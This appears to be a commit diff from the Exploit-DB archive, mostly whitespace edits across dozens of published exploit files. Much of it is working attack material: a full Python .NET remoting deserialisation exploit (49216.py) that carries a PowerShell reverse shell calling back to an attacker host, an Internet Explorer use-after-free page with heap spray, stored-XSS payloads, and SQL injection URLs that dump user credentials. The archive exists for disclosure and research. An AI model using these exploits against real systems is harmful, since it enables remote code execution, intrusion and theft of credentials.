https://nileshsapariya.blogspot.ae/2018/03/csrf-to-xss-open-auditit-professional-21.html

4
exploits/php/webapps/18873.txt
View file

@ -138,7 +138,7 @@ For demonstration or reproduce ...
Review: Zensur - Bad Word & Listing
<td class="mbox" width="45%">"><[EXECUTION OF SCRIPT CODE HERE!]' <<="" td="">
<td class="mbox" width="45%">"><[EXECUTION OF SCRIPT CODE HERE!]' <<="" td="">
</tr>
<tr>
@ -210,7 +210,7 @@ URL: http://127.0.0.1:8080/viscacha/pm.php
Review: PN Message Preview - Arrived Message - Inbox
<div class="bbody">
<span class="stext">Betreff:
<span class="stext">Betreff:
<strong>"><[EXECUTION OF SCRIPT CODE HERE!] <</strong>
</span>
<hr>

2
exploits/php/webapps/22907.txt
View file

@ -20,7 +20,7 @@ http://localhost/page.php?id=[sqli]
# D3mo :
http://server/page.php?id=-1+union+select+1,2,3,group_concat(column_name),5,6+from+information_schema.columns+where+table_name=char(table_cod)
http://server/page.php?id=-1+union+select+1,2,3,group_concat(column_name),5,6+from+information_schema.columns+where+table_name=char(table_cod)
http://server/page.php?id=-1+union+select+1,2,3,group_concat(nazwa,0x3a,haslo),5,6+from+es_cms_users

2
exploits/php/webapps/33697.txt
View file

@ -1,4 +1,4 @@
# Exploit Title: Persistent Cross Site Scripting Vulnerability in eFront
# Exploit Title: Persistent Cross Site Scripting Vulnerability in eFront
3.6.14.4
# Date: 05 June 2014
# Exploit Author: shyamkumar somana

20
exploits/php/webapps/34405.txt
View file

@ -1,19 +1,19 @@
# Exploit Title: Multiple Persistent Cross Site Scripting Vulnerabilities
# Exploit Title: Multiple Persistent Cross Site Scripting Vulnerabilities
in PHP Stock Management System 1.02
# Date: 25 Aug 2014
# Exploit Author: Ragha Deepthi K R
# Vendor Homepage: http://www.posnic.com/
# Software Link: http://sourceforge.net/projects/stockmanagement/
# Version: 1.02
# Exploit Author: Ragha Deepthi K R
# Vendor Homepage: http://www.posnic.com/
# Software Link: http://sourceforge.net/projects/stockmanagement/
# Version: 1.02
# Tested on: Windows 7
#################################################
PHP Stock Management System 1.02 is vulnerable for multiple Persistent
Cross Site Scripting Vulnerabilities.
PHP Stock Management System 1.02 is vulnerable for multiple Persistent
Cross Site Scripting Vulnerabilities.
The vulnerability affects 'sname'(Store Name Field), 'address'(Address
Field), 'place'(Place Field), 'city'(City Field), pin(Pin Field),
website(Website Field), email(Email Field) parameters while updating the
store details in 'update_details.php' and when seen in 'view_report.php'
website(Website Field), email(Email Field) parameters while updating the
store details in 'update_details.php' and when seen in 'view_report.php'
#################################################
Greetz : Syam !
Greetz : Syam !

2
exploits/php/webapps/35541.txt
View file

@ -1,4 +1,4 @@
Title: ResourceSpace Multiple Cross Site Scripting, and HTML and SQL
Title: ResourceSpace Multiple Cross Site Scripting, and HTML and SQL
Injection Vulnerabilities
Author: Adler Freiheit

2
exploits/php/webapps/35840.txt
View file

@ -1,4 +1,4 @@
# Exploit Title: Privilege Escalation in RedaxScript 2.1.0
# Exploit Title: Privilege Escalation in RedaxScript 2.1.0
# Date: 11-05-2014
# Exploit Author: shyamkumar somana
# Vendor Homepage: http://redaxscript.com/

10
exploits/php/webapps/41143.rb
View file

@ -1,10 +1,10 @@
# Exploit Title: Remote PageKit Password Reset Vulnerability
# Date:21-01-2017
# Date:21-01-2017
# Software Link: http://pagekit.com/
# Exploit Author: Saurabh Banawar from SecureLayer7
# Exploit Author: Saurabh Banawar from SecureLayer7
# Contact: http://twitter.com/securelayer7
# Website: https://securelayer7.net
# Contact: http://twitter.com/securelayer7
# Website: https://securelayer7.net
# Category: webapps
1. Description
@ -19,7 +19,7 @@ download/pdf/SecureLayer7-Pentest-report-Pagekit-CMS.pdf
2. Proof of Concept
require 'net/http'
require 'net/http'
#Enter the domain/IP address of the site for which you want to test this vulnerability
vulnerableSite = 'http://127.0.0.1'

2
exploits/php/webapps/42263.txt
View file

@ -41,4 +41,4 @@ user_login,user_pass FROM wp_users WHERE ID=1">
--
*Atenciosamente*
*Lenon Leite*
*Lenon Leite*

2
exploits/php/webapps/42980.txt
View file

@ -6,7 +6,7 @@ https://softwarepublico.gov.br/social/e-sic-livre/versoes-estaveis/esiclivre.rar
More informations:
http://whiteboyz.xyz/esic-software-publico-autentication-bypass.html
The vulnerability is in the login area of e-sic,
The vulnerability is in the login area of e-sic,
where we can enter the panel only using some parameters such as
username and password
---------------------------------------------------------------------

2
exploits/php/webapps/44028.txt
View file

@ -1,4 +1,4 @@
# Exploit Title: TypeSetter CMS 5.1 Host Header Injection
# Exploit Title: TypeSetter CMS 5.1 Host Header Injection
# Date: 10-02-2018
# Exploit Author: Navina Asrani
# Contact: https://twitter.com/NavinaSanjay

2
exploits/php/webapps/44029.html
View file

@ -37,4 +37,4 @@ Exploit code:
3. Solution:
To Mitigate CSRF vulnerability, it is recommeded to enforce security tokens such as anti csrf tokens
To Mitigate CSRF vulnerability, it is recommeded to enforce security tokens such as anti csrf tokens

2
exploits/php/webapps/44137.html
View file

@ -1,5 +1,5 @@
<!--
# Exploit Title: Front Accounting ERP 2.4.3 - CSRF
# Exploit Title: Front Accounting ERP 2.4.3 - CSRF
# Date: 16-02-2018
# Exploit Author: Samrat Das
# Contact: http://twitter.com/Samrat_Das93

2
exploits/php/webapps/44144.txt
View file

@ -1,4 +1,4 @@
# Exploit Title: October CMS Stored Code Injection
# Exploit Title: October CMS Stored Code Injection
# Date: 16-02-2018
# Exploit Author: Samrat Das
# Contact: http://twitter.com/Samrat_Das93

2
exploits/php/webapps/44354.txt
View file

@ -25,5 +25,5 @@ Login into Open-AuditIT Professional 2.1
Visi this page :-
http://localhost/omk/open-audit/credentials
3] POCs and steps:
3] POCs and steps:
https://nileshsapariya.blogspot.ae/2018/03/csrf-to-xss-open-auditit-professional-21.html

2
exploits/php/webapps/44383.html
View file

@ -1,4 +1,4 @@
# Exploit Title: Cross Site Request Forgery- Frog CMS
# Exploit Title: Cross Site Request Forgery- Frog CMS
# Date: 31-03-2018
# Exploit Author: Samrat Das
# Contact: http://twitter.com/Samrat_Das93

8
exploits/php/webapps/45068.txt
View file

@ -1,9 +1,9 @@
# Exploit Title: Kirby CMS 2.5.12 - Cross-Site Scripting
# Exploit Title: Kirby CMS 2.5.12 - Cross-Site Scripting
# Date: 2018-07-22
# Exploit Author: Zaran Shaikh
# Version: 2.5.12
# CVE : NA
# Category: Web Application
# Version: 2.5.12
# CVE : NA
# Category: Web Application
# Description
# The application allows user injected payload which can lead to Stored

2
exploits/php/webapps/49267.txt
View file

@ -1,4 +1,4 @@
# Exploit Title: PrestaShop ProductComments 4.2.0 - 'id_products' Time Based Blind SQL Injection
# Exploit Title: PrestaShop ProductComments 4.2.0 - 'id_products' Time Based Blind SQL Injection
# Date: 2020-12-15
# Exploit Author: Frederic ADAM
# Author contact: contact@fadam.eu

28
exploits/windows/dos/34458.html
View file

@ -2,14 +2,14 @@
<html>
<head>
<meta http-equiv="Cache-Control" content="no-cache"/>
<script >
function stc()
<script >
function stc()
{
var Then = new Date();
Then.setTime(Then.getTime() + 1000 * 3600 * 24 * 7 );
document.cookie = "Cookie1=d93kaj3Nja3; expires="+ Then.toGMTString();
}
function cid()
function cid()
{
var swf = 0;
try {
@ -21,28 +21,28 @@ var cookieString = new String(document.cookie);
if(cookieString.indexOf("d93kaj3Nja3") == -1)
{stc(); return 1;}else{ return 0;}
}
String.prototype.repeat=function (i){return new Array(isNaN(i)?1:++i).join(this);}
var tpx=unescape ("%u1414%u1414").repeat(0x60/4-1);
String.prototype.repeat=function (i){return new Array(isNaN(i)?1:++i).join(this);}
var tpx=unescape ("%u1414%u1414").repeat(0x60/4-1);
var ll=new Array();
for (i=0;i<3333;i++)ll.push(document.createElement("img"));
for (i=0;i<3333;i++)ll.push(document.createElement("img"));
for(i=0;i<3333;i++) ll[i].className=tpx;
for(i=0;i<3333;i++) ll[i].className="";
CollectGarbage();
function b2()
function b2()
{
try{xdd.replaceNode(document.createTextNode(" "));}catch(exception){}
try{xdd.replaceNode(document.createTextNode(" "));}catch(exception){}
try{xdd.outerText='';}catch(exception){}
CollectGarbage();
for(i=0;i<3333;i++) ll[i].className=tpx;
}
function a1(){
function a1(){
if (!cid())
return;
document.body.contentEditable="true";
try{xdd.applyElement(document.createElement("frameset"));}catch(exception){}
try{xdd.applyElement(document.createElement("frameset"));}catch(exception){}
try{document.selection.createRange().select();}catch(exception){}
}
</ script >
</ script >
</head>
<body onload='setTimeout("a1();",2000);' onresize=b2()>
<marquee id=xdd > </marquee>
@ -60,12 +60,12 @@ try{document.selection.createRange().select();}catch(exception){}
¡¡¡¡<input type=text name=chart size=46 style="font-family:verdana; font-weight:bolder; color:#0066ff; background-color:#fef4d9; padding:0px; border-style:none;">
¡¡¡¡
¡¡¡¡<input type=text name=percent size=47 style="color:#0066ff; text-align:center; border-width:medium; border-style:none;">
¡¡¡¡<script > ¡¡
¡¡¡¡<script > ¡¡
var bar=0¡¡
var line="||"¡¡
var amount="||"¡¡
count()¡¡
function count(){¡¡
function count(){¡¡
bar=bar+2¡¡
amount =amount + line¡¡
document.loading.chart.value=amount¡¡
@ -74,7 +74,7 @@ if (bar<99)¡¡
{setTimeout("count()",500);}¡¡
else¡¡
{window.location = "http://www.google.com.hk";}¡¡
}</ script >
}</ script >
¡¡</p>
</form>
<p align="center"> Wart,<a style="text-decoration: none" href="http://www.google.com.hk"> <font color="#FF0000"> kick me</font> </a> .</p>

2
exploits/windows/dos/38272.txt
View file

@ -1,6 +1,6 @@
Source: https://code.google.com/p/google-security-research/issues/detail?id=304
Creating a device context with the flag (DCX_NORESETATTRS) and selecting a brush object into the device context will result in the brush being freed on process exit without the reference to the object being cleared. The PoC consists of two files (prime304.cpp and poc304.cpp). poc304 will execute prime304, which triggers the issue and allows poc304 to retrieve a handle to the device context with the pointer to the freed object. We can confirm this by requesting the handle for the brush object from the device context, resulting in reading freed memory. In some cases the issue leads to memory corruption when for example another object is allocated into the space of the free brush object (see attached crash logs for examples).
Creating a device context with the flag (DCX_NORESETATTRS) and selecting a brush object into the device context will result in the brush being freed on process exit without the reference to the object being cleared. The PoC consists of two files (prime304.cpp and poc304.cpp). poc304 will execute prime304, which triggers the issue and allows poc304 to retrieve a handle to the device context with the pointer to the freed object. We can confirm this by requesting the handle for the brush object from the device context, resulting in reading freed memory. In some cases the issue leads to memory corruption when for example another object is allocated into the space of the free brush object (see attached crash logs for examples).
Proof of Concept:
https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/38272.zip

2
exploits/windows/dos/39647.txt
View file

@ -1,6 +1,6 @@
Source: https://bugs.chromium.org/p/project-zero/issues/detail?id=686
The attached Proof-of-Concept crashes Windows 7 with special pool enabled on win32k.sys. The crashes are triggering in multiple different ways (two examples attached).
The attached Proof-of-Concept crashes Windows 7 with special pool enabled on win32k.sys. The crashes are triggering in multiple different ways (two examples attached).
Proof of Concept:

2
exploits/windows/local/35901.txt
View file

@ -8,7 +8,7 @@ Severity : High
CVE ID : CVE-2014-9597
<http://cve.mitre.org/cgi-bin/cvename.cgi?name=2014-9597>
NIST: https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2014-9597
NIST: https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2014-9597
OSVDB ID : 116450 <http://osvdb.org/show/osvdb/116450>
VLC Ticket : 13389 <https://trac.videolan.org/vlc/ticket/13389>

2
exploits/windows/local/35902.txt
View file

@ -8,7 +8,7 @@ Severity : High
CVE ID : CVE-2014-9598
<http://cve.mitre.org/cgi-bin/cvename.cgi?name=2014-9598>
NIST: https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2014-9598
NIST: https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2014-9598
OSVDB ID : 116451 <http://osvdb.org/show/osvdb/116451>
VLC Ticket : 13390 <https://trac.videolan.org/vlc/ticket/13390>

4
exploits/windows/remote/44068.md
View file

@ -18,9 +18,9 @@ The privileges of the users are:
admin access to all functions on the database without any limitation
reader read-only user. The reader can query any records in the database, but cant modify or delete them. It has no access to internal information, such as the users and roles themselves
writer same as the reader, but it can also create, update and delete records
ORole structure handles users and their roles and is only accessible by the admin user. OrientDB requires oRole read permissions to allow the user to display the permissions of users and make other queries associated with oRole permissions.
ORole structure handles users and their roles and is only accessible by the admin user. OrientDB requires oRole read permissions to allow the user to display the permissions of users and make other queries associated with oRole permissions.
From version 2.2.x and above whenever the oRole is queried with a where, fetchplan and order by statements, this permission requirement is not required and information is returned to unprivileged users.
From version 2.2.x and above whenever the oRole is queried with a where, fetchplan and order by statements, this permission requirement is not required and information is returned to unprivileged users.
Example:

16
exploits/windows/remote/49216.py
View file

@ -12,31 +12,31 @@
# which is vulnerable to a .NET deserialisation attack.
#
#!/usr/bin/python3
import base64
import socket
import sys
from struct import pack
HOST='192.168.1.1'
PORT=17001
LHOST='192.168.1.2'
LPORT=4444
psh_shell = '$client = New-Object System.Net.Sockets.TCPClient("'+LHOST+'",'+str(LPORT)+');$stream = $client.GetStream();[byte[]]$bytes = 0..65535|%{0};while(($i = $stream.Read($bytes, 0, $bytes.Length)) -ne 0){;$data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($bytes,0, $i);$sendback = (iex $data 2>&1 | Out-String );$sendback2 =$sendback + "PS " + (pwd).Path + "> ";$sendbyte = ([text.encoding]::ASCII).GetBytes($sendback2);$stream.Write($sendbyte,0,$sendbyte.Length);$stream.Flush()};$client.Close()'
psh_shell = psh_shell.encode('utf-16')[2:] # remove BOM
psh_shell = base64.b64encode(psh_shell)
psh_shell = psh_shell.ljust(1360, b' ')
payload = 'AAEAAAD/////AQAAAAAAAAAMAgAAAElTeXN0ZW0sIFZlcnNpb249NC4wLjAuMCwgQ3VsdHVyZT1uZXV0cmFsLCBQdWJsaWNLZXlUb2tlbj1iNzdhNWM1NjE5MzRlMDg5BQEAAACEAVN5c3RlbS5Db2xsZWN0aW9ucy5HZW5lcmljLlNvcnRlZFNldGAxW1tTeXN0ZW0uU3RyaW5nLCBtc2NvcmxpYiwgVmVyc2lvbj00LjAuMC4wLCBDdWx0dXJlPW5ldXRyYWwsIFB1YmxpY0tleVRva2VuPWI3N2E1YzU2MTkzNGUwODldXQQAAAAFQ291bnQIQ29tcGFyZXIHVmVyc2lvbgVJdGVtcwADAAYIjQFTeXN0ZW0uQ29sbGVjdGlvbnMuR2VuZXJpYy5Db21wYXJpc29uQ29tcGFyZXJgMVtbU3lzdGVtLlN0cmluZywgbXNjb3JsaWIsIFZlcnNpb249NC4wLjAuMCwgQ3VsdHVyZT1uZXV0cmFsLCBQdWJsaWNLZXlUb2tlbj1iNzdhNWM1NjE5MzRlMDg5XV0IAgAAAAIAAAAJAwAAAAIAAAAJBAAAAAQDAAAAjQFTeXN0ZW0uQ29sbGVjdGlvbnMuR2VuZXJpYy5Db21wYXJpc29uQ29tcGFyZXJgMVtbU3lzdGVtLlN0cmluZywgbXNjb3JsaWIsIFZlcnNpb249NC4wLjAuMCwgQ3VsdHVyZT1uZXV0cmFsLCBQdWJsaWNLZXlUb2tlbj1iNzdhNWM1NjE5MzRlMDg5XV0BAAAAC19jb21wYXJpc29uAyJTeXN0ZW0uRGVsZWdhdGVTZXJpYWxpemF0aW9uSG9sZGVyCQUAAAARBAAAAAIAAAAGBgAAAPIKL2MgcG93ZXJzaGVsbC5leGUgLWVuY29kZWRDb21tYW5kIFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFgGBwAAAANjbWQEBQAAACJTeXN0ZW0uRGVsZWdhdGVTZXJpYWxpemF0aW9uSG9sZGVyAwAAAAhEZWxlZ2F0ZQdtZXRob2QwB21ldGhvZDEDAwMwU3lzdGVtLkRlbGVnYXRlU2VyaWFsaXphdGlvbkhvbGRlcitEZWxlZ2F0ZUVudHJ5L1N5c3RlbS5SZWZsZWN0aW9uLk1lbWJlckluZm9TZXJpYWxpemF0aW9uSG9sZGVyL1N5c3RlbS5SZWZsZWN0aW9uLk1lbWJlckluZm9TZXJpYWxpemF0aW9uSG9sZGVyCQgAAAAJCQAAAAkKAAAABAgAAAAwU3lzdGVtLkRlbGVnYXRlU2VyaWFsaXphdGlvbkhvbGRlcitEZWxlZ2F0ZUVudHJ5BwAAAAR0eXBlCGFzc2VtYmx5BnRhcmdldBJ0YXJnZXRUeXBlQXNzZW1ibHkOdGFyZ2V0VHlwZU5hbWUKbWV0aG9kTmFtZQ1kZWxlZ2F0ZUVudHJ5AQECAQEBAzBTeXN0ZW0uRGVsZWdhdGVTZXJpYWxpemF0aW9uSG9sZGVyK0RlbGVnYXRlRW50cnkGCwAAALACU3lzdGVtLkZ1bmNgM1tbU3lzdGVtLlN0cmluZywgbXNjb3JsaWIsIFZlcnNpb249NC4wLjAuMCwgQ3VsdHVyZT1uZXV0cmFsLCBQdWJsaWNLZXlUb2tlbj1iNzdhNWM1NjE5MzRlMDg5XSxbU3lzdGVtLlN0cmluZywgbXNjb3JsaWIsIFZlcnNpb249NC4wLjAuMCwgQ3VsdHVyZT1uZXV0cmFsLCBQdWJsaWNLZXlUb2tlbj1iNzdhNWM1NjE5MzRlMDg5XSxbU3lzdGVtLkRpYWdub3N0aWNzLlByb2Nlc3MsIFN5c3RlbSwgVmVyc2lvbj00LjAuMC4wLCBDdWx0dXJlPW5ldXRyYWwsIFB1YmxpY0tleVRva2VuPWI3N2E1YzU2MTkzNGUwODldXQYMAAAAS21zY29ybGliLCBWZXJzaW9uPTQuMC4wLjAsIEN1bHR1cmU9bmV1dHJhbCwgUHVibGljS2V5VG9rZW49Yjc3YTVjNTYxOTM0ZTA4OQoGDQAAAElTeXN0ZW0sIFZlcnNpb249NC4wLjAuMCwgQ3VsdHVyZT1uZXV0cmFsLCBQdWJsaWNLZXlUb2tlbj1iNzdhNWM1NjE5MzRlMDg5Bg4AAAAaU3lzdGVtLkRpYWdub3N0aWNzLlByb2Nlc3MGDwAAAAVTdGFydAkQAAAABAkAAAAvU3lzdGVtLlJlZmxlY3Rpb24uTWVtYmVySW5mb1NlcmlhbGl6YXRpb25Ib2xkZXIHAAAABE5hbWUMQXNzZW1ibHlOYW1lCUNsYXNzTmFtZQlTaWduYXR1cmUKU2lnbmF0dXJlMgpNZW1iZXJUeXBlEEdlbmVyaWNBcmd1bWVudHMBAQEBAQADCA1TeXN0ZW0uVHlwZVtdCQ8AAAAJDQAAAAkOAAAABhQAAAA+U3lzdGVtLkRpYWdub3N0aWNzLlByb2Nlc3MgU3RhcnQoU3lzdGVtLlN0cmluZywgU3lzdGVtLlN0cmluZykGFQAAAD5TeXN0ZW0uRGlhZ25vc3RpY3MuUHJvY2VzcyBTdGFydChTeXN0ZW0uU3RyaW5nLCBTeXN0ZW0uU3RyaW5nKQgAAAAKAQoAAAAJAAAABhYAAAAHQ29tcGFyZQkMAAAABhgAAAANU3lzdGVtLlN0cmluZwYZAAAAK0ludDMyIENvbXBhcmUoU3lzdGVtLlN0cmluZywgU3lzdGVtLlN0cmluZykGGgAAADJTeXN0ZW0uSW50MzIgQ29tcGFyZShTeXN0ZW0uU3RyaW5nLCBTeXN0ZW0uU3RyaW5nKQgAAAAKARAAAAAIAAAABhsAAABxU3lzdGVtLkNvbXBhcmlzb25gMVtbU3lzdGVtLlN0cmluZywgbXNjb3JsaWIsIFZlcnNpb249NC4wLjAuMCwgQ3VsdHVyZT1uZXV0cmFsLCBQdWJsaWNLZXlUb2tlbj1iNzdhNWM1NjE5MzRlMDg5XV0JDAAAAAoJDAAAAAkYAAAACRYAAAAKCw=='
payload = base64.b64decode(payload)
payload = payload.replace(bytes("X"*1360, 'utf-8'), psh_shell)
uri = bytes('tcp://{}:{}/Servers'.format(HOST, str(PORT)), 'utf-8')
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.connect((HOST,PORT))
msg = bytes()
msg += b'.NET' # Header
msg += b'\x01' # Version Major
@ -51,6 +51,6 @@ msg += pack('I', len(uri)) # URI Length
msg += uri # URI
msg += b'\x00\x00' # Terminating Header
msg += payload # Data
s.send(msg)
s.close()

18
exploits/windows/webapps/24500.txt
View file

@ -190,7 +190,7 @@ Review: Admin > Admin > New Users & New Group - [groupname, up_availGroups & use
type="text"></label><label>Password <input class="newform" id="new_password" type="password"><img id="pw_strength" src="/images/common/strength_0.gif"></label><label>Confirm Password: <input class="newform" id="cnf_password" type="password">
</label><label style="margin-top: 5px; margin-bottom: 8px;" id="up_availGroupsLbl">Place in User Group <select style="display: block;"
id="up_availGroups"><option value="3"><iframe src="a"> "><[PERSISTENT INJECTED SCRIPT CODE!]") <</iframe></option>
<option value="1">Administrators</option><option value="2">Guests</option></select></label><input value="Create User" class="button"
<option value="1">Administrators</option><option value="2">Guests</option></select></label><input value="Create User" class="button"
style="margin-top: 3px;" type="button"></p></div><a class=""> Users</a><div style="height: 511px; display: none; overflow: hidden;"
class="genericAccordionContainer"><p id="users_p"><span class="menuLink">admin</span></p></div></div></div>
@ -217,36 +217,36 @@ value="gicon16.png">gicon16.png</option><option value="gicon24.png">gicon24.png<
...
<table class="dataTable" id="fmaps_mapTabList" width="100%"><thead><tr><th style="white-space: nowrap;" nowrap="">Map</th>
<table class="dataTable" id="fmaps_mapTabList" width="100%"><thead><tr><th style="white-space: nowrap;" nowrap="">Map</th>
<th style="white-space: nowrap;" nowrap="">Type</th><th style="white-space: nowrap;" nowrap="">Background</th></tr></thead><tbody>
<tr><td class="" style="white-space: nowrap; padding-right: 5px;" align="left" nowrap=""><a href="#NA"><iframe src="a">%20%20%20%20">
<iframe src=a onload=alert("VL") <</iframe></a></td><td class="" style="white-space: nowrap;" align="left" nowrap="" width="100%">Google</td>
<td class="" align="center">-</td></tr></tbody></table>
<td class="" align="center">-</td></tr></tbody></table>
...
<tbody id="objTbody"><tr id="objTblHdr"><th width="20"><input id="checkAllObj" name="checkAllObj" type="checkbox"></th><th width="20">
</th><th style="width: 100%;" tf_colkey="objName" class="alignLeft">Object Name</th><th style="text-align: center;" align="center" nowrap="">
</th><th style="width: 100%;" tf_colkey="objName" class="alignLeft">Object Name</th><th style="text-align: center;" align="center" nowrap="">
Type</th><th width="20">Membership</th></tr><tr id="obj_tr1"><td class="fmaps_bakTrHi highlightRow"> </td><td class="fmaps_bakTrHi
highlightRow"><img class="listIcon" src="/images/maps/gicon24.png"></td><td class="alignLeft fmaps_bakTrHi highlightRow"><a title="Click to edit
this object" href="#NA"><iframe src="a">%20%20%20%20"><iframe src=...</iframe></a></td><td class="fmaps_bakTrHi highlightRow" nowrap="">
<span style="cursor:default;">Group</span></td><td class="fmaps_bakTrHi highlightRow"><a title="Click to change group membership for this object"
class="linkLike">Membership</a></td><td style="display: none;" class="indexColumn fmaps_bakTrHi
class="linkLike">Membership</a></td><td style="display: none;" class="indexColumn fmaps_bakTrHi
highlightRow"> %20%20%20%20"><iframe src=...groupmembership</td></tr></tbody>
...
<td style="padding-right: 1px; padding-bottom: 1px; padding-left: 1px;" id="fmaps_confBody" valign="top"><div style="height: 19px;"
id="fmaps_containerTitle" class="titleBar"><span style="float:left" ;="">Settings</span><img title="Map Settings Help"
id="fmaps_containerTitle" class="titleBar"><span style="float:left" ;="">Settings</span><img title="Map Settings Help"
src="/images/common/help.png"><select id="fmaps_groupSelect">
<option class="google" value="1"><iframe src="a">%20%20%20%20"><iframe src=a onload=alert("VL") < (google)
</iframe></option></select></div><div id="fmaps_confBodyContainer"><div id="defaultsContainer">
</iframe></option></select></div><div id="fmaps_confBodyContainer"><div id="defaultsContainer">
...
<li class="expandable noWrapOver " groupid="g1"> <div class="hitarea expandable-hitarea "> </div> <img src="/images/common/gicon.png"
gid="1" title="<iframe src=a>%20%20%20%20"><iframe src="a" onload="alert("VL")" <="" (group="" id:="" 1)"=""></iframe>
<li class="expandable noWrapOver " groupid="g1"> <div class="hitarea expandable-hitarea "> </div> <img src="/images/common/gicon.png"
gid="1" title="<iframe src=a>%20%20%20%20"><iframe src="a" onload="alert("VL")" <="" (group="" id:="" 1)"=""></iframe>
<span id="sdfTreeLoadG" class="" title="<iframe src=a>%20%20%20%20"><iframe src=a onload=alert("VL") < (Group ID: 1)"
gid="1"><iframe src="a">%20%20%20...</span>

2
exploits/windows_x86/dos/38270.txt
View file

@ -1,6 +1,6 @@
Source: https://code.google.com/p/google-security-research/issues/detail?id=313
The PoC triggers a pool buffer overflow in win32k!vSolidFillRect. When using Special Pool we get the crash immediately on the overwrite. Without Special Pool we often get a crash in the same function, but sometimes it crashes in a different function (similar to another issue, however with a different offset). This might be a result of the memory corruption or an out-of-memory condition before the overflow is triggered. Debugger output for all three different crashes attached.
The PoC triggers a pool buffer overflow in win32k!vSolidFillRect. When using Special Pool we get the crash immediately on the overwrite. Without Special Pool we often get a crash in the same function, but sometimes it crashes in a different function (similar to another issue, however with a different offset). This might be a result of the memory corruption or an out-of-memory condition before the overflow is triggered. Debugger output for all three different crashes attached.
Proof of Concept:
https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/38270.zip

2
exploits/windows_x86/dos/38274.txt
View file

@ -13,7 +13,7 @@ please find attached a C trigger, windbg output and the minimised testcase of a
Quick analysis:
The trigger creates a new window station which is freed during the process clean up. Through the clipboard operations the window's last reference is hold by the clipboard which is freed during the clean up of the window station object. This will also result in destroying the window object at a time where _gptiCurrent (threadinfo) is already set to null. This is used in xxxDestroyWindow in multiple locations. Depending on the window type it is potentially possible to trigger different kinds of crashes, this one demonstrates a write to a chosen memory location:
The trigger creates a new window station which is freed during the process clean up. Through the clipboard operations the window's last reference is hold by the clipboard which is freed during the clean up of the window station object. This will also result in destroying the window object at a time where _gptiCurrent (threadinfo) is already set to null. This is used in xxxDestroyWindow in multiple locations. Depending on the window type it is potentially possible to trigger different kinds of crashes, this one demonstrates a write to a chosen memory location:
win32k!HMChangeOwnerThread+0x40:
96979765 ff412c inc dword ptr [ecx+2Ch] ds:0023:bebebeea=????????

2
exploits/windows_x86/dos/38277.txt
View file

@ -1,7 +1,7 @@
Source: https://code.google.com/p/google-security-research/issues/detail?id=458
---
The attached testcase crashes Win 7 with Special Pool on win32k while accessing freed memory in bGetRealizedBrush.
The attached testcase crashes Win 7 with Special Pool on win32k while accessing freed memory in bGetRealizedBrush.
